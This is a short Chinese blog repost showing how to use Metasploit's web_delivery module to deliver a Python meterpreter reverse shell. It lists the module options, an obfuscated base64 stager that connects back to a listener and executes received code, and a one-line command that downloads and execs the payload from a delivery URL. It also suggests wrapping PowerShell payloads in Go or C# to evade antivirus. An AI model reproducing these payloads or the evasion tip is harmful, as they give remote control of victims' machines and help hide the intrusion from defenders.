Pyhton載入MeterpreterWeb_delivery程式碼
版權宣告:本文可能為博主原創文章,若標明出處可隨便轉載。 https://blog.csdn.net/Jailman/article/details/77574162
Webdelivery的options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
—- ————— ——– ———–
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /test no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
LHOST 127.0.0.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
— —-
0 Python
生成的檔案內容
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,`UTF-8`)}[sys.version_info[0]](`aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMjcuMC4wLjEnLDQ0NDQpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK`)))
呼叫命令
python -c “import urllib2; r = urllib2.urlopen(`http://127.0.0.1:8080/test`); exec(r.read());”
使用PowerShell執行的payload語句可以封裝到golang或者C#中實現免殺的目的
相關文章
- Pyhton開發入門心得
- Vue程式碼分割懶載入Vue
- webpack懶載入程式碼原理深究Web
- jQuery圖片預載入程式碼jQuery
- canvas載入效果程式碼例項Canvas
- Pyhton列印barcode及二維碼標籤
- 動態載入javascript指令碼程式碼例項JavaScript指令碼
- spring日誌載入程式碼解析Spring
- js ajax惰性載入程式碼例項JS
- js載入解析xml檔案程式碼JSXML
- C#入門程式碼[轉載][收藏]C#
- CSS3 loadding載入程式碼CSSS3
- javascript圖片預載入程式碼例項JavaScript
- js圖片預載入程式碼片段分享JS
- jQuery載入進度條例項程式碼jQuery
- CSS載入遠端字型例項程式碼CSS
- UEFI載入程式
- 【Hadoop】pyhton連結hiveHadoopHive
- Pyhton內建函式大全函式
- webpack,非同步載入,程式碼分割,require.ensureWeb非同步UI
- JavaScript文件載入完成後再去執行程式碼JavaScript行程
- js圖片緩衝載入程式碼例項JS
- js動態載入外部css檔案程式碼JSCSS
- 程式碼分割與懶載入情況下(code-splitting+lazyload)抽離懶載入模組的公用模組程式碼
- 軟體安裝程式第二篇(載入程式原始碼)原始碼
- 30行Javascript程式碼實現圖片懶載入JavaScript
- 外掛化之程式碼呼叫與載入資源
- 不用寫程式碼也能做表單 —— 載入meta即可
- javascript動態載入css檔案程式碼例項JavaScriptCSS
- jquery圖片預載入簡單程式碼例項jQuery
- jQuery實現圖片預載入程式碼例項jQuery
- 利用函式的惰性載入提高 javascript 程式碼效能函式JavaScript
- 小程式分包載入
- 原生JS動態載入JS、CSS檔案及程式碼指令碼JSCSS指令碼
- 程式碼下載
- 非阻塞載入指令碼指令碼
- 動態載入js或者css檔案程式碼例項JSCSS
- jQuery如何實現頁面載入完畢再去程式碼jQuery